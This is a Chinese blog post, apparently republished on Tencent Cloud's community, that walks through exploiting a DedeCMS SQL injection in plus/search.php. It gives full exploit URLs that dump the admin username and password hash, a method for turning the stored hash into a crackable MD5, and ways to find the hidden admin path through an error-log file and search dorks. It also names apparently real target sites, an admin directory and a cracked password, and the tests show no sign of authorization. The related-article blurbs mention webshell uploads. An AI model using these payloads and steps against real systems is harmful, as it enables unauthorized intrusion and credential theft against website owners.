前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >利用织梦CMS0day注入漏洞渗透测试

利用织梦CMS0day注入漏洞渗透测试

作者头像
phith0n
修改于 2023-09-23 08:33:35
修改于 2023-09-23 08:33:35
3.5K00
代码可运行
举报
运行总次数:0
代码可运行

利用织梦CMS0day注入漏洞渗透测试

网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。

测试的是这两个网站:http://www.example1.com/ 和 http://www.example2.tv/ ,利用页面是plus/search.php。

步骤1:注入得到账号密码

提交http://www.example1.com/plus/search.php?keyword=as&typeArr[ uNion ]=a 和 http://www.example2.tv/plus/search.php?keyword=as&typeArr[ uNion ]=a 我们得到如下反馈:

反馈为1时利用如下exp:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

获得如下页面可见到账号和加密过的密码(中间绿色的一行):

反馈为2时利用如下exp:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
http://www.example2.tv/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

获得如下页面中也爆出了账号密码:

如果反馈正常则说明漏洞不存在。

(以上exp作者: 鬼哥 )

步骤2:破解密码

dede的后台密码加密算法大家可以下了整站看,这里直说解法:将得到的20位密文去掉开头三位,去掉末尾一位,即为16位md5密码。

如第一例中拿到的0038c7ad73902a9f1d87去首三末一为8c7ad73902a9f1d8,破解出的密码是15858272308。

步骤3:查找后台地址

dede的后台目录可能改成任何名字,而且不需要插入数据库,也就是说通过注入漏洞是无法爆出后台地址的。不过网上有个简单的方法,访问 /data/mysql_error_trace.inc 里面或许能得到后台的相关信息。

我试了,第一例失败,第二例成功如下:

我们可以看到,这是一个记录数据库错误的文件,看到那个/ooxx/了吗,那个就是后台目录:http://www.newflash.tv/ooxx

如果这个方法失败,还可以通过google搜索的方法:构造site:bianminxueche.com intitle:后台 等关键字搜索,也许能得到后台地址。

其他方法还有社工、暴力搜索等。

总结:

由于第一个网站后台无法找到,第二个网站md5破解不出,两个网站的渗透失败了。但是这个漏洞却是真正存在的,虽然官方早已给出了补丁,但是仍然有不少站点没有修补,希望站长朋友能赶紧行动,避免损失。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
新手入侵笔记_探灵笔记适合新手的角色
1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls
全栈程序员站长
2022/11/08
2.3K0
AppCMS注入及评论xss漏洞
Appcms是一款开源cms系统,适合做手机应用类的网站。官网地址:http://www.appcms.cc/ 这是默认首页,看起来挺不错的:
phith0n
2020/10/16
1.9K0
AppCMS注入及评论xss漏洞
织梦CMS安装后的安全优化设置,有效防护木马
织梦CMS在安装完成后,新人往往会直接开始开发使用,忽视了一些安全优化的操作,这样会导致后期整个系统安全系数降低,被黑或者被注入的概率极高,毕竟这世界百分百存在着极多的无聊hacker对全网的网站进行扫描,扫到你这个菜站,尤其是使用率极高的DEDECMS,对你的站点下手的欲望更高,所以在开发前做好安全防范还是很有必要的!
米米素材网
2022/07/15
2.9K0
织梦CMS安装后的安全优化设置,有效防护木马
渗透测试SQL注入漏洞原理与验证(2)——SQL注入漏洞利用
攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
zhouzhou的奇妙编程
2024/09/23
5730
意外发现一套cms的注入漏洞
事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们学校官网,后来朋友他找到了我让我帮助他进行安全检测。
ittongluren
2019/11/20
1K0
意外发现一套cms的注入漏洞
渗透测试常见点大全分析
select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database()))))
天钧
2019/11/28
1.4K0
渗透测试常见点大全分析
DedeCMS全版本通杀SQL注入漏洞利用代码及工具
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,近日,网友
FB客服
2018/02/02
5.9K0
DedeCMS全版本通杀SQL注入漏洞利用代码及工具
一次通过漏洞挖掘成功渗透某网站的过程
起因 我们的一个客户希望我们对其网站进行渗透测试,以发现其脆弱点并协助改进安全性。在拿到对方渗透测试授权之后,我们开始了对其网站的分析。 寻找突破口 对方主站是一个定制开发的CMS,在进行一系列扫描和分析之后,未发现可利用的地方,于是开始分析其二级域名,发现其中某资源管理分站,目标操作系统linux,仅开放HTTP(80端口),整站程序为ResourceSpace,一个开源php建站程序。 漏洞挖掘 因为是开源程序,考虑其漏洞挖掘相对容易一些,于是决定把这个网站作为突破口。于是到resources
FB客服
2018/02/02
2.4K1
一次通过漏洞挖掘成功渗透某网站的过程
渗透测试面试问题2019版,内含大量渗透技巧
https://github.com/Mr-xn/BurpSuite-collections/blob/master/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E9%97%AE%E9%A2%982019%E7%89%88.md
Power7089
2019/08/20
11.1K0
渗透测试面试问题合集
b、端口,弱口令,目录等扫描,对响应的端口进行漏洞探测,比如 rsync,心zang出血,mysql,ftp,ssh弱口令等。
行云博客
2022/05/11
2.7K0
干货 | 渗透测试全流程归纳总结
  从旁观者的角度了解整个WEB应用乃至整个目标的全貌,但是资产是收集不完的,可以边收集,边进行一定程度的测试。信息收集最小的粒度应是目录。
HACK学习
2021/03/03
4.5K0
【代码审计】iZhanCMS_v2.1 漏洞分析
爱站CMS是一款开源免费的CMS内容管理系统,具有开放灵活,安全高效,简洁美观!本次针对iZhanCMS_v2.1版本进行代码审计,发现代码中存在的安全漏洞。
Bypass
2019/07/08
7150
【代码审计】iZhanCMS_v2.1 漏洞分析
小白渗透测试指南
当拿到一个合法的渗透测试项目时,我们需要知道我们肾透的目标是什么?域名 IP 系统环境 等等。有了目标也就有了方向。
逍遥子大表哥
2022/09/09
7340
小白渗透测试指南
偶然的一次渗透测试
本来,我是在看一篇科普文章的,做着提到了safe3这个漏扫工具,我就向想试一下这个工具如何,利用google hacking找了一个php的站,扫描完提示有可能存在sql注入,那还等什么就直接开始操练了。
tnt阿信
2020/08/05
5980
偶然的一次渗透测试
渗透测试-如何高效率挖掘漏洞
21、22、3306等远程端口,可使用超级弱口令工具或者railgun自带模块进行暴力破解
hyyrent
2022/12/26
1.4K0
渗透测试-如何高效率挖掘漏洞
dedecms 漏洞修复方案及解决网站被黑的办法
前段时间网站被黑了,从百度打开网站直接被劫持跳转到了cai票,du博网站上去,网站的首页index.html文件也被篡改成一些什么北京sai车,pk10,一些cai票的关键词内容,搞得网站根本无法正常浏览,从百度搜索我们公司网址,直接被百度拦截,提示什么:百度网址安全中心提醒您:该页面可能存在违法信息!截图如下:
技术分享达人
2019/02/19
6.4K0
渗透测试思路整理
有些时候渗透测试搞着搞着就陷入了无解状态,不知道再从哪儿下手了 故对渗透测试思路做个整理,后续有新的见解持续更新
中龙技术
2022/09/29
1.9K0
渗透测试思路整理
网站渗透测试,看这篇就够了
2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。
天钧
2020/02/26
3.2K0
在线挑战详细攻略-《渗透测试笔记》
Step 01 > 目标地址:172.16.12.2 172.16.12.3(注意:本实验中一共有两个目标地址) 本机地址:172.16.11.2 第一题的要求是获取ww.test.ichunqiu后台登录密码。 首先打开浏览器,进入首页ww.test.ichunqiu, 自己注册一个账户,进入 [会员中心],点击左侧菜单 [专题管理] 下的 [创建专题],详情如下图所示: > 专题名称、专题分类、权限设置、专题封面等信息自由填写; > 专题创建完毕之后,点击 [专题管理],在右边的专题列表中选
奶糖味的代言
2018/04/16
1K0
渗透测试公司实战安全测试拿下目标
近来,利用sql注入、xss和文件上传漏洞,成功getshell的一个客户网站(必须要拿到客户授权渗透测试许可证明才可以,不得违法入侵),这里简单记录一下整个过程,与大家分享。收集信息,查找漏洞。第一步就是进行信息收集,经过一轮的收集,发现这个网站租的是香港的服务器,没有waf文件;从网站的界面看,这个网站是用cms搭建的,搭建的环境是Iis10.0+php,同时通过目录扫描工具发现了一些网站的目录,但没有找到后台登录地址(这肯定是网站管理员隐藏了后台的地址)。
技术分享达人
2020/12/08
8480
渗透测试公司实战安全测试拿下目标
相关推荐
新手入侵笔记_探灵笔记适合新手的角色
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验